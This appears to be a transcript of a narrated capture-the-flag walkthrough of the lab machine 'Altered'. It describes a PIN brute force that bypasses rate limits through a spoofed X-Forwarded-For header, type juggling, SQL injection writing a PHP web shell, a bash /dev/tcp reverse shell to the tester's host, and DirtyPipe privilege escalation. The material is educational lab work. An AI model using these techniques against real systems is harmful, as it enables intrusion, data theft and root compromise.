What's going on YouTube? This is IPSec. I'm doing Altered from the UHC March Finals. The box is a Laravel web app that has a few vulnerabilities. It starts off with just a simple multi-factor authentication brute force. Actually, it's a password reset brute force where the application gives you a 4-digit PIN, but doesn't invalidate the PIN code upon a few invalid attempts. Instead, it depends on IP address to handle rate limiting. So if you can spoof your IP, which in this case we can use the x-forwarded4 header to spoof the IP, we can bypass that rate limit and brute force the PIN code. Once you get authenticated, you can do an SQL injection, but it has a secure parameter trying to prevent unexpected data from getting the servers. But you can use type juggling to force that secure parameter to true and do SQL injection to write a shell to the web server, which is vulnerable to DirtyPipe. But if you try to run SU, there's a fun surprise in for you. So with that being said, let's get into the box. As always, we start with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it altered, and then the IP address of 10.10.11.159. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's running nginx, but also on Ubuntu. We have the HTTP title of the UHC March Finals, and there's not really that much other information. So let's go take a look at the actual web page. So I'm going to go to 10.10.11.159, and we just have a UHC player dashboard. We can enter names of players. Maybe I was playing, so I put IPSec in the password of password. And we get invalid username, and we also get forget password. So because it's saying invalid username, we can potentially enumerate valid users. We could go to like the UHC webpage and find previously qualified players for their tournament, like Silesian. So if I did like Silesian and password, we see invalid password. So this is a pretty good finding of a way to enumerate usernames. Now for the Hack the Box edition of this, I did allow admin. So I think admin is here, so invalid password, but when this box was played live on UHC, admin was not an account. But Hack the Box people don't know previous UHC players, so that's why I put admin in. And we get this thing, it says, please enter the PIN code emailed to you. And it gives us a hint that the PIN code is going to be 4 digits long. So I'm going to try 9001, and it says invalid PIN code, but also tells us to be sure to use the same browser you requested from. So generally this error message is because there's something about our browser that the web server ties to the PIN code. So I start out by going into like my storage tab. I can look at cookies, and the cookies tells me this is indeed a Laravel application, so I know it's PHP. We got cross-site request forgery. I think there's also like local storage that things could hide in, but most likely it's going to be cookie, but I still check things like local storage. Now I'm looking at this cookie, and let's go to CyberChef real quick, because the cookie itself looked like a big base64 string, right? So if I put this as the input, we see that's definitely looking like base64. I see a %3d that is equals in URL encoding. So the first thing I'm going to do is like from URL, or maybe just type URL decode. And there we go. We have decoded that. And now we want to decode base64. So from base64, we get an IV. So this is initialization vector, and then a value here. So if I now paste this, we just get a blob. And because it has initialization vector beforehand, I'm going to assume this is something, oh wait, we have all this. MAC, this is like some type of signing in crypto. So based upon having an IV and a MAC field, I'm going to guess Laravel encrypts the data in the cookie. So this could be like my actual session, what's in it. I'm not positive, but based upon having an IV and a MAC, I'm going to move on and just try to brute force this thing. So if I, let's see, go back to the web page, we want to intercept a request. So I'm going to send it to Burp Suite. We'll do 1, 2, 3, 4. And in here, we have it. And we could send this over to like Intruder and brute force it this way, but I have the free version of Burp Suite and Intruder is not great on free. I do notice this is a post request to /API/reset token. And if we know from our previous Laravel videos, when it says API, it's going to the API middleware, which maybe is vulnerable to type juggling. So let's try that real quick. If I look at this, the bytes is 6437. I'm going to look for the content type field so I can change it from URL encoded to just JSON. And then we can try name is equal to admin. And what was the other one? Pin. We got to put this in quotes to be true. So now we're doing some type juggling, and we'll see if this works. 6437. It's the same exact thing. I'm going to guess this is the same response that we got before, and this isn't vulnerable to type juggling. So let's revert our request back to the default and try to just brute force this. So we want to guess all numbers between 0 and 9999, or quad nines. I'm going to be lazy when I do this because I don't want to format like 1 to be 0001. Probably don't have to do that, honestly, because in the PHP code, let's see. Well, I guess it depends how it's treating this. If it's treating pin as a string, so if we did like if 0001 is equal to 1, echo success. Let's see what happens here. Let's see, triple equals, we know that it's doing that. And it's not echoing success. If we just did it 1, I think it's converting both of these to integers because it's not a strict type. I'm not exactly sure why. I did not expect that to happen. But I'm guessing it's doing some type of thing to juggle it back to an integer. And then those are equal because 01 is the same thing as 1. If we got rid of the quotes and did a triple equals, it still says success. So in PHP, whenever you do comparisons, definitely pay attention to the number of equals because chances are you want 3. It is kind of funny. Like I do 3 equals with quotes around 0001 and 1, and it doesn't echo success. I don't put those quotes, and it does. And the whole reason to this is it's converting these to an integer for me. And with the 3 equals, it tells PHP, hey, treat the value as it was given. It was given as string. Do not convert it to integer. Whereas here, I do have the 3 equals, but I specified integers. So these are still technically the same value because we gave it in integer form by not putting the quotes. So hopefully that makes sense. But we want to juggle the pin. I'm going to be lazy and do 1000 to 9999. So WFUZZ-H, we're going to give the header for the cookie because it says pay attention to the browser. So we will. So we paste our cookie in. And then the next thing we want is another header because in WFUZZ, you always want, when you do a post, you always want to send the content type. If you don't, you get weird error messages that you may miss. So I always get in the habit of sending content type. I don't know if it's required, but the cases when it is required and you don't, it'll mess you up. So always do it. Better safe than sorry, right? The URL was API/reset token. Okay. And then -D for data. This is going to be the data in the post request. We can do name is equal to admin and pin is equal to fuzz. So we kick this off and we have bad data. We need to specify what we want to fuzz, right? We didn't give it a word list. I'm going to do -Z range and then 1000 to quad 9. And what we want to do, I noticed something weird. We had this 140 character response, then we had a 36 character response, and a bunch of 36 character responses after that. If I go back, we're still at 36. I send this refresh, and we're getting an error message now. We have 429 too many requests. So we got rate limited by Laravel. If we submit this without Burp Suite, we may actually see the page. Come on, come back to me. API reset, method not allowed. Too many requests. This is what the error message looks like. So if we Google like bypass rate limit, I'm going to add hack tricks to it actually. Let's see, rate limit bypass. And it talks about a bunch of origin headers. And the reason why this works is because we have Laravel and we have nginx, and Laravel is probably configured to allow nginx to be a proxy. And when that's the case, it's going to allow nginx the ability to overwrite IP addresses in actual headers. So in the Laravel application, the IP address it sees is going to be the one nginx specifies. And if we tell nginx that we're a different IP, then Laravel is going to get a different IP, and we'll bypass the rate limit. So let's make sure we're rate limited again. Doesn't look like we are. I'm going to spin this up so we do get rate limited. We can say x forwarded for 127.0.0. I'm going to say 3. And I send this request, and we don't get that error message. It's 200 OK. If I take this out, it's 429. Put this back in, 200 OK. So we have a way to bypass the way Laravel is doing its rate limiting. So we just have to configure this in WFUZZ, and it's actually not super easy. Or actually, it is easy. It's just not intuitive. Let's see. If I can do WFUZZ documentation, let's see if we have something. Read the docs. There's a -m flag, and I was trying to pull it up exactly all the modes. Let's see. Zip. Is there a mode thing? Scan mode. Oh, come on. Where is it, WFUZZ? HTTP verbs. So I'm just going to try to explain it. I don't know all the modes. I know there's a zip mode, and we're going to give it 2 different lists. We're going to give it the range, which we have here, and we're also going to give it a word list of random numbers. And the numbers are just going to be the last octet of the IP. And the reason why we're doing that is so we can completely change the IP, each request. And then the mode, this -m zip, is just going to tell WFUZZ how to use each word list. And the zip mode is going to say, use it, the word, like, this range is going to be the fuzz1 parameter. And then the next thing I'm going to put is going to be fuzz2 parameter. It says, use each of these sequentially and keep going down the list. There are different modes to do it. Like you could say, combine the 2 word lists. So it says, go through all of this word list, then go through all the second and put those in both the responses. Most often when you do 2 word lists, you're going to want to use zip. So maybe it'll make more sense once we do it. And what we have to do is create numbers. And if we just do a range, we'll try this again real quick, -z range, and we're going to say 1 through, is it range? Yeah, 1 through 254, right? So now we have IPs 1 through 254. That sounds good. We add the header. Let's go over to Burp Suite. And let's see, x forwarded 4, copy, paste, and we do FUZ to Z. And that's going to be the second parameter. So when I run this, we see everything, right? Like, here's the first parameter we sent, the pin code. Here's the second one, the IP address. But because we did zip, it just stops whenever the first word list is exhausted. In this one, the second word list gets exhausted after 253, so it stops. So what I'm going to do is for I in sec 1 through 254, do echo I, done. So we just have a loop. I'm going to write this to numbers. And I'm going to write it to numbers again. And we want to write it to numbers how many times? 1270. We want this to be as close to 9999 as possible. So we'll just do it a bunch more times. See what we're at. 3,000. I probably should have done some mental math to do this, but I'm lazy, as you know. There we go. I'm just going to keep going up until I have enough numbers to exhaust the whole pin code space. I probably could have stopped at 9,000 because I'm only doing 1,000 to whatever. So there's a 1 in 10 chance that I don't get a pin code. But if I don't get a pin code, I just run it again, right? It's not a big deal. So now I change this range parameter. We're going to do -w numbers. And now we just want to hide the invalid attempts. And all the things are 5644 characters. So I'll do --h, I think HH to hide characters. 5644. And here we go. Everything's hidden. We're going through the list. When it hits 254, it comes back. And if we get a rate limit thing, it will come back as well and tell us we are rate limited. So this process can probably take 1 to 3 minutes. And if it doesn't come back, maybe our pin code was under 1,000. But little hint, I coded this application and I was too lazy to look up how to format numbers under 1,000 to be 4 digits. So I just went ahead and on the backend server code made it 1,002.9999. So I know this is going to hit as long as I did everything up here correct. If it doesn't, I will probably delete my cookies and get a new cookie because my Laravel session could have got invalidated for whatever reason. So maybe that's it. But yeah, I'm just going to wait for this to finish. And here we go. We have a hit right now. It is still at 200, so I don't think this is a rate limit. And of course, we're not getting a lot more rate limit, so obviously not. We have 7815. And this -212 is just, remember, it's that second word list we used. The 127.00212 IP address was it. So let's copy 7815. We can kill our WFUZZ. Go back here. We can probably click back. So we're back at this pin code. 7815, submit. And it's asking us to change the password. So I'm going to put the password as please subscribe. We'll log into the application. So admin, please subscribe, and we get in. So here we have a UHC player dashboard. And if we click on the profile for view, we can find information about all the players. So nothing really too interesting here. We can see the admin is this account was created for the HTTP version of the box, but I'm going to go over to Burp Suite and we're going to intercept this and see what this request looks like. So we have a GET request. It's going to API GetProfile, ID equals 4, and it has a secret parameter. I don't know what that is, but if I changed ID, let's do ID equals 3, we get tampered user input detected. So if I go back to this, we can look at the bottom. This is all in JavaScript, I guess, because the links don't show anything. But if I intercept a different one, I can see the secret stays the same. So secret's 89CB on ID equals 1. We forward that. We refresh the page. Let's intercept this again. The secret still is the same exact thing for ID 1. It begins with 89CB. If I go to the next one, we have 2, and it's C516. So this looks like an MD5 sum. And I say MD5 sum because I can kind of eyeball this length, and that looks like 32 characters. We can validate that, but that looks certainly an MD5 sum. So the server on the back end is building all these user parameter fields and also MD5 summing probably the ID along with some type of secret and giving that to the user. So the user doesn't know how the server generates the secret, and since the user doesn't know, they can't tamper any input. So it's a way to allow dynamic input, but lock it down to only what the server expects. Because if I put a single quote here, we have tampered input detected. So we could try things like a hash length extension attack against this. But I mean, again, it's going to this API endpoint. So I always like doing type juggling when I see it going to an API. So I can say content type is equal to application JSON, and then bring this data, put it in the body of the request. And if you go to my ransom video, we also did a type juggling attack here. It was also a UHC box. It was the UHC qualifiers. And that's something I like doing is I make the qualifier box have a technique that's also in the finals box because all the players should be familiar with this technique by now. So we see I convert it to JSON. It works. If I change it to 5, tampered user input, but I'm going to do type juggling here and just say secret is true. And boom, this works. Now we can do tampered user input, right? So the first thing I'm going to do, add a semicolon, a single quote. We get server error. This is looking good. I do a comment. It's still being bad. If I did this, we have it errored because the ID field didn't exist because we have bad code right here. So that's why I escaped this one double quote. But we keep getting server error. If I don't do a quote and just do a comment, it seems to work, right? If I didn't do a comment, I take one of these dashes out, it gets server error. So now I know this is probably SQL injectable and the actual backend code is not using a quotation mark. So let's just try union select 1. And we can put a comment on the end for good measure. Server error 2, 3. Boom. We have now union injection working. I'm going to change this to ID is equal to 100, something that's not in the database, because if it's not in the database, it's going to use the parameter from over here. And we have 3. So if I put anything here, if I do ipsec, I probably should put that in single quotes, we can write data. So at this point, we want to extract things from the information schema table to understand the database structure. And we've probably done this 100 times, but just in case you run into issues like me often, I always Google information schema MySQL doc. Just Google this, go to the first result. If you go to the general tables, you can see all the tables in this. The first one you want is the schemata table, and it has all the information you need. So in this one, we're going to do schema name because this is going to be the database name. So we can get rid of this, and I'm going to do a group concat. And what group concat's doing is it's taking multiple rows and converting it into one line because the output is expecting one line. So we have to give it one line. If we give it multiple, it won't work. We can try it without it real quick. Let me just put this in my clipboard. Schema name, I said line, from information schema dot schemata, like this. We only get one. So we could probably limit it and try to get multiple, like limit 1, we get MySQL 1 information schema 1, is it 2 1? So we could go like this and get each of the tables out. What this is doing is saying limit it to one result starting at row number what. And I hate doing multiple queries when we could just convert it into all those rows into just one, and now we have all the databases just on one line. So we want the UHC database. So at this point, I want to grab information out of this, and I want to get the table names and column names. And so I'm going for 2 columns out of a table, or 2 definitions, I guess. We need the concat line as well, because we're combining multiple things that are on one row into just one thing. If I didn't do it, it would look something like this. I'd have to do table name from information schema dot, let's see, is it columns where table schema is equal to UHC, like that. Does this work? And we have a list of all the tables, and then we could get a list of columns as well, but we don't have those associated with the table. So I do the concat to be able to put multiple fields on one line. So concat, table name, and then we're going to separate it with a colon. We can do column name, like that. We have to do a enter parentheses. And now we have everything here. So failed jobs, connection, failed jobs, exception. It's not really pretty because it put them all on one line. So we can break that by just starting the line with a line break. And here we go. We have a list of everything. So this is all just Laravel stuff. We have password reset. This isn't interesting. Tasks. This is just from an old project because all my Laravel boxes just started from the same thing. I probably should have cleaned this out, but I didn't. We probably want users. So we can do username and user password. So we replace table name with, let's see. We want this to be name and this to be password. And then from, we can do UHC because we're not in the information schema table anymore. Dot users. And we can get rid of this where statement. And now we have a list of users and hashes. So if we wanted to, we could try cracking each of these passwords, but that is not where this vulnerability is. What we have to do is drop a file on this. So I was just showing like the SQL injection because this is the route I would go, but we end up getting no interesting information out of the database. So the next thing is we want to see if we can drop a web shell on this server. Now, since it's a Laravel application, it's not just going to be in var www HTML. We have to find out exactly where it is. It is running nginx, so we can try the default nginx location. So let's see, is it load file? Let's just try etc passwd to make sure we can read files. There we go. I think that's because I didn't revert the box. Let me revert the box and get this to a clean state because we shouldn't see that there yet. So, okay, so I reverted the box and I was going to edit this out, but this actually showed me something really cool. Like earlier, I was like, I don't know exactly what's in this Laravel session cookie, right? I assumed it was some type of crypto included in my session information, but I've confirmed that because I reverted the box. I didn't log back in. This is the same exact cookie we had before. So because of that, I now know that this Laravel cookie contains information that like about my session. It's just encrypted. So if we got all the Laravel secrets out of this application, we could just forge our own cookies. It's not like in the database. So how like a typical PHP application works is the PHP underscore session variable maps to a directory. It's normally like var temp and it's a file. And the PHP session is just an MD5 sum. So when the server gets it, it looks at the the PHP session that you provided it. It goes to the file and gets all the data out of it. But right here, this cookie didn't exist yet because I reverted the box. And somehow it still treats me as logged in. So one of two things happened. Either this endpoint is unsecure and I have a vulnerability in the application that I didn't know that allows unauthenticated people to execute it if they aren't authenticated. And that's it. So a second vulnerability we have. I wonder if someone could crawl this and just get it. Let's see real quick. Sorry for this like segue, but this is like how my mind goes when I start creating new things. So I was wrong with that Laravel thing probably because this API endpoint doesn't require authentication. My bad. Sloppy code by me. Oh, ID and secret field is required. So you probably didn't even need to like do the whole password reset thing. You could probably skip to this thing if you figured out GetProfile. So the next thing I would be doing here is I'd be going to opseclist, right? And then I would just grep-r capital for GetProfile and see if it exists in a word list, right? I probably want to do $1 and a caret. So that starts with GetProfile and ends starts and ends. So if this exists in a word list, there was a big flaw in my application. But maybe we should look at that after the video. Let's get back into this while that grep runs. Or GetProfile doesn't exist, so chances are no one would find this endpoint. But interesting, unintended anyways. We want to get the nginx config. So etc nginx sites-enabled default is, I think, the default location for the config. It is. So we see root is in serve altered public, right? So I'm going to do a INTO OUTFILE. So let's say ipsec, just hit enter here, server error. We want to put a single quote, ipsec, INTO OUTFILE, and we'll write it to please subscribe.html. See if we can write this file. We get a server error, but when you write things into a file, it's not going to return a row, and since it didn't return a row, we may get an error message, but it may have still wrote. So we should still test if that file exists. It does. We get 12 ipsec. So now we can probably write a shell. So let's try PHP and then request CMD like this. I want to say that will work. Before we do this whole INTO OUTFILE thing, let's just make sure it echoes what we expect. So this would be written in the file. That looks good to me. So let's write it. And we want to put this into a PHP file. So I'm going to do please subscribe.php. We get server error, but if we do this, we just get 1, 2. If I say question mark CMD is equal to ID, didn't work, right? That's weird. ls. So that's not working. Do we have an error somewhere? PHP. We want to do system. We got to tell it to execute a command first, right? If I just try to write this, I don't think it's going to overwrite the file, so we have to create a new name. So I'll call it silly mistake.php. And let's try this. And I'm still getting a message. So let's see. PHP system request CMD into out file. I don't do a $sign there. And this will be ipsec can't code. There we go. Third time's the charm. If this doesn't work, then I should start up a PHP session locally and test my scripts. But here we go. We have it working. No one gets it right the first time. Don't feel bad if you make mistakes. Because that's why we're doing this in Hack the Box, so we learn from our mistakes and learn the best way to do it. So, happens to everyone. Let's go to Burp Suite, refresh the page, send it into repeater, and I'm going to change the request method, and we want to send me a reverse shell. So, --c, --i, dev tcp 10.10.14.8, port 9001 0 and 1 like that. And we can URL encode this for good measure. NC LVNP. Let's do it on a new pane. 9001. Send it, and we get our shell. So I'm going to do a Python 3-c import pty.spawn bin bash. Okay. That looks good. stty raw minus echo. fg enter enter. And whenever you do stty raw minus echo, you should put fg on the same line. It's habit, I don't, but I should be doing that. Export term is equal to xterm, so now I can clear the screen. And whenever I get a shell, I like to go back and just make sure I did not hang the web server, right? So I'm going to copy this, send it again, make sure we get some input or output that we haven't got, so we know it's not just cached. We can see the web server still works, so we're not causing an outage. Every now and then when you do a reverse shell on an application, you may like hang the web server and the whole web server is not responding. So as you're typing away in your shell, like anyone that's trying to use the application can't, and they get frustrated and you get caught. So always good to double check and make sure the application still works after you get your shell. Anyways, for this privesc, I'm gonna do a little bit of hand waving magic stuff and say when you do uname and you see the kernel, you should be able to know if it's exploitable or not. In this case, let's see. If we Google DirtyPipe exploit and go here, let's see when this is. The CVE's in 2022, and it says kernel since 5.8. I'm looking at this. I see 2020. This is the build date of the kernel, January 10th. So this kernel was built on January 10th. When did DirtyPipe come out? Let's see. Where is the date? DirtyPipe, probably around March 10th. So the kernel built in January 10th is probably going to be vulnerable to a kernel privesc a few months later, right? So we're just going to try DirtyPipe out. If I take this exploit that's on this page, I don't exactly like the exploit because it can lead to a lot of mistakes, but we'll show it real quick. So do I have GCC on this box? I probably don't because I'm mean and did not include that, but let's make a directory dpipe and then go in here, v dpipe.c. We can paste it and do gcc dpipe.c out. I'm going to call this original. This will be the original exploit. Python 3-m http.server. And we can just go dev shm and download and execute. So 10.10.14.8, 8000 / orig. And this is DirtyPipe. And if we execute it, it wants the target file, the offset, and the data. So the DirtyPipe vulnerability requires us to be able to read the file. A lot of exploits are using etc passwd because everyone can read that. The offset, if I just do 1, actually let's do head-1 etc passwd first. So I can do original etc passwd offset of 1 data. I'm going to do a capital O, right? It says it worked. I do a head on the etc passwd, and I see I overwrote the second character in this. The DirtyPipe actually can't overwrite the very first character. It can only write after the first byte. So let's restore this file so we don't like break the box. So if I had -1, this is restored. So I think it was 1992 that the shadow file came about. And before that, passwords restored right here where this X is. This is user, password, UID, group ID. I don't know what this one is. I think this is group maybe, home directory, and shell. So before 1992, before shadow, people put the password hashes here because this is a time like before security. And passwords, like brute forcing things wasn't a big thing, I guess. So being able to read the password hash, people are like, well, people can't reverse this hash. It's fine. Anyone can read it. And then someone came up, well, I can just like crack this password hash and get the password. And that became a big deal. So someone created shadow and then moved the private pieces of information to accounts into the shadow file. And that was around 1992, I believe. But we can still put something in this spot, a password, and have it authenticate. So let's test that out. I'm going to do DirtyPipe exploit. I'm going to Google Aaron because I know the main POC that makes this super easy puts the password as Aaron. So let's copy this exploit and do it, right? Let's see, if I go cd dpipe v dpipe2.c, we're going to gcc dpipe2.c, and I'm going to call this one Aaron because that's what it's writing the password to. And we can wget it. Where's my wget? There we go. Aaron. chmod plus x Aaron. So I try to execute this. It says it set the root password and then system function failed. If I do a head, I can see root has this password set. So let's try an SU to figure out why this thing broke, because the password should be Aaron. They put the, this is MD5 crypt. And MD5 crypt, this is the salt. You can put the salt to anything you want. He put the salt to his name as well. I just realized that. I do a SU, and what the heck just happened? I'm in a game of Wordle. There's a PAM Wordle module installed on SU just as a fun thing. This box was created for UHC, so people are hacking this box live, and I just thought this would be a really fun troll. There's a way around this, but if you wanted to, there's a functioning game of Wordle, which you have to guess H-A-C-K, 5-character words. So if we do a word that doesn't exist, falls, we get unknown word, right? So we have to guess words, and I replaced the dictionary with this to be hacker words. So I'm going to do hacks. We know the third character in this is C. So I don't really know of other things. I hate being put on the spot to do this. This is a bad one. I'm just doing a Linux syscall. Wouldn't be a good guess because I know this field is C, but I don't know anything off the top of my head that would be C. fstat, we know there's a T in this. So one of these fields is T. Let's see. Is crack one of the words? Unknown word. That would have been a good one to add. Shell. So it ends in L, has a C in the middle, and also has a T. So I have really no idea. Let's just get what the word was, right? fstat. The word was IOCTL, syscall. If we put the password of Aaron in now, it's going to fail because we did not successfully play a Wordle game. So this was an annoying thing I had done, but yeah, so we know there's an I in a thing, but really no idea. This one was clone. So I'm really bad at Wordle. So there's ways around this, right? We can write over any file. So if we write over a SetUID file, we don't have to play this game of Wordle because it's a PAM module. It's being done on the SU call. We can't do like the sudoers files because we can't read, was it etc sudoers? Like, whoops. If I do a ls.la on this file, come on, IPsec, learn how to type. Only root can read this, so we can't really modify this file, but we can modify SetUID binaries. So if I Google DirtyPipe SetUID, maybe exploit 2, where is it? I know there is one. GitHub. Is there one here? Exploit2.c. I want to say this one is the SetUID. So it's going to drop a elf file that's going to open temp sh, and it's going to write the code to it, and then chmod it, and then return the file. So I think that's what it's doing. So let's try this out. DirtyPipes.c. And then we'll cheat and play Wordle, because that'd be a fun way to wrap the video. vdpipe3.c. gcc. We'll call this one SetUID dpipe. And then wget SetUID-dpipe chmod plus x on this /SetUID dpipe. It wants us to put the SQL file we want to overwrite. Find /-perm. Is it -4000 to do this? Like this. Let's see. Let's overwrite. What thing do we want to overwrite? We'll overwrite pk exec. I'm laughing because there was a recent vulnerability in pkexec. We do this, and boom, we are now root. So yeah, it says don't forget to clean up temp sh because that's a reverse shell. We could now go into root, cat words. Let's copy all these words to a text file and cheat to play your game. We can exit this pipe. I'm going to exit out of my shell, v, words, paste it in, and now let's play Wordle. So let's get a word out of here, opsec. So we know it has an S and a C. So let's see. I wonder if I can do grep. Oh, we don't know where it is. So I'm just going to grep for S out of words and also grep for C. And then we can do a grep-v and say we don't want O, we don't want P, and we don't want E. So there's 3 words this could now be. Hacks, and that is correct. That was the word. I'm going to do the password of an incorrect password. So I didn't type Aaron there, and we have a failure. So let's play it again real quick. Let's try hacks again. It has an S, so it doesn't have H-A-C-K, but it has an S. And there we go. So let's see. Let's try worms. Man, I am getting good at that guess. Aaron. And we get in. So that was the other way you could do it if you actually played Wordle. I made that intentionally hard if you don't have the word list. Let's see. Let's drop an SSH key here. So make dir.ssh. It already exists. Let's do an SSH key gen because I want to look at the code around my get whatever. So -f root the get profile code because it's not accepting authentication, and I honestly thought I put authentication there. So let's copy this. So echo, is that going to echo still? To authorized keys. Okay. I probably should have done 2 brackets, but oh well. SSH-I root at 10.10.11 dot. What is the IP address of this box? 159? Yes. Awesome, we're in. So let's just SEP the app to us. So SEP root. It was in SRV altered. Here -r. We want to be recursive, so we download the directory. What? Oh. That's where the key is. There we go. So now I'm going to download the application. And we will open it in Codium. Probably should have zipped that up, because that's going to take a while. Let's do a tar cjvf. We'll call it app.tar.bz2. And then we'll say it's in SRV altered. There we go. app.tar.bz2. And this should copy almost instantly. I'm in SSH. There we go. Come on, copy. So there we go. Much quicker because we're not doing all that extra overhead of downloading each file. So let's see, JVF. Is that right? Awesome. I love when I get the tar syntax the correct first time. So we can do up open. Let's see. This is What is the box? Altered. What? HTTP altered? Where am I? Oh, I'm just in altered, not HTTP. Home, altered, SRV. Here we go. So now I have all the Laravel source code. So let's see, if I go to routes, I go to API. We just have auth controller. I'm guessing I probably should have put a user thing here, honestly. I'm trying to remember how to make an API endpoint authentication required. If I go to GetProfile, let's see. That would be in, not public, resources, no, app, HTTP, controllers. This is the auth controller. GetProfile. I think I need to put a user here to require. Let's see. Name. Custom login. Let's see. If I Google Laravel API endpoint require authentication. This should be it. API authentication. Generating tokens, hashing. Protecting routes. Function request. Let's see. Ah, here it is. Wow, that zoom feature did not work there. But in this, before the actual route, it's saying the auth API, and then here's the user endpoint. So if I wanted to, I would have to go to, let's see, this API, and this would be something like, let's see, if I paste this, we do route middleware auth API, post, and then something like this, right? I'm not sure if that is correct, because we'll also probably have to create a token somehow, right? Because I don't think that's going to work, because we also have to give it like JWT token, I think this is. Let's just see if this magically fixes it. I don't think it will, but we can try. If it doesn't, then oh well, maybe if there's enough people that want it, I'll do a live stream of fixing this application. But let's try serve altered. Let's just SSH. Get a proper shell, right? We have to go DPipe like that. Okay. Bash serve altered. We want to go into public, not public, routes v API like that. We don't want reset token though. We want it to be GetProfile. So copy this. Like that. I don't know what auth sanctum is. I need to look that up as well. So did I just do it again? I did it again. How stupid am I right there? We want to do it on GetProfile. There we go. So let's see if we just crash our application now when I write this. So we go back into repeater. And I do this. We get server error. Of course we do. 3. It's still writing. And I don't have a cookie. Save it. So this did not enforce Authentication. So honestly, I don't know exactly how. Is the answer. Shoot. Well, I hate sometimes when I do these things and don't know. But honestly, that's why I create these boxes. So I can figure these things out. Let me try one last thing. PHP artisan cache. Is it routes? Route. Is it route cache? Maybe it was that was breaking it. Ah! That looks better. Server error now. So Laravel does have this route caching thing, so I had to clear the route cache after editing the file. Let's see. API. Okay. We can try with the cookie again. We probably have to brute force this and get a new cookie. So I don't have a cookie in my repeater window. We can try setting this. I don't know if this is a good one or not. Still server error. I'm going to try real quick. Let's redo a WFUZZ and see if it works. A major if, because I'm guessing we have to code something to be able to give us a JWT token. I don't think it's just magically going to give it to us, but who knows? So let's try admin password, invalid, forgot, admin, 1234, invalid pin code. So what I'm going to do that I have a shell on the server, instead of brute forcing it, I'm going to check if it's in, let's see, storage, is it framework, sessions. Here's where Laravel stores cookies. And I'm going to get, let's see, if I do the first few characters, EYJ. No. Let's see. Let's go back to CyberChef. Come on, paste. Let's see. We want to URL decode this first. Then we want to base64 decode from base. Base64. There we go. Maybe the session is F9 it starts with. I don't know. Let's just choose the latest file. April 1st. If I cat zy. Let's see. Token. We want pin. So I'm going to grep pin for everything. Let's see. Do we have a valid pin in this session? Reset, flash. I'm looking for 4 digits, right? Grep 0 through 9, 4. So it highlights it. That's weird. Four, three, two, one. Invalid pin code. Let's clear our cookies and redo this real quick. 159. Log in with a bad thing. Forgot. Admin. Does anything highlight? No. Maybe I did some weird hashing on the pin, which means I can't do this. I assume I'd just be able to pull the pin out of the source code, but I can see pin is a string and 32 characters, I know what I did. On the server, I'm hashing username and then MD5 sum. So I can't just pull it from this. Let's do that WFUZZ again real quick. I'm starting to annoy myself with how I coded this application. We'll look at the code after I delete all of this, and I can show you exactly what happened in that session. I'm curious if anyone's actually watching through to this point. But man, that is a long header I need to remove. I should have did this a different way. Oh well. I'm almost there. Come on. Delete the rest of this. Here we go. So we can, let's go to the network tab. We have a reset here. Let's just do it again. Reset, edit. Let's grab the cookies. Name, here we go. Paste. That's not it. Let's do the other paste. That looks better. I'm probably not going to be in a directory where numbers is. Let's see. Altered. There we go. Now we go. A fuzzing. So if I go to, let's see, this reset token endpoint. So this is in auth controller, reset token, and we have MD5, pin, and username. So this was my way of hacking up something so you couldn't like reset Salesian's account and then replay his token on the admin user, because in the back end, the name is required. And I put the name when you do the initial reset into your session. So even though you're passing a name to the pin code, it's pulling it from session when it validates, so you can't reset other users' passwords. Probably a horrible way to go about this. The other thing I found interesting when I was creating this application, let's see, custom login. Did I put it in task controller? Reset token, where is it? It's probably GetProfile, right? So the reason this is SQL injectable is because of this one, where raw. So if you're doing a static code analysis against Laravel, you may want to look for any DB query that has raw in it, because that's allowing them to do a raw SQL query, which enables the SQL injection. Typically speaking, you have to go out of your way to do this, but I have seen SQL injections in Laravel before, and it always comes to developers for one reason or the other using this where raw thing. So in this thing, I mean, most people here, SQL injecting, use parameterized statements and things. When in this one, it's just like your framework does allow you to do dangerous things. Make sure you know when you're doing a dangerous thing and try not to do it in the dangerous way, right? I'm just waiting on WFUZZ now, so I'm going to pause the video and we'll just let this finish. And there we have it. We have the pin code 8773. So let's go back here, type it, change the password. We'll put the password to password, log in with admin password, and see if I broke this. And I did. We're not giving it a JWT token in this. So all of my queries to the profile are broken. So I honestly don't know how to put the authentication on the API endpoint. I think I did it in a box before, but again, it's just highlighting like this is why I create boxes, to actually learn these frameworks so I can figure out ways around them. So hope you guys enjoyed this video. Take care, and I will see you all next time.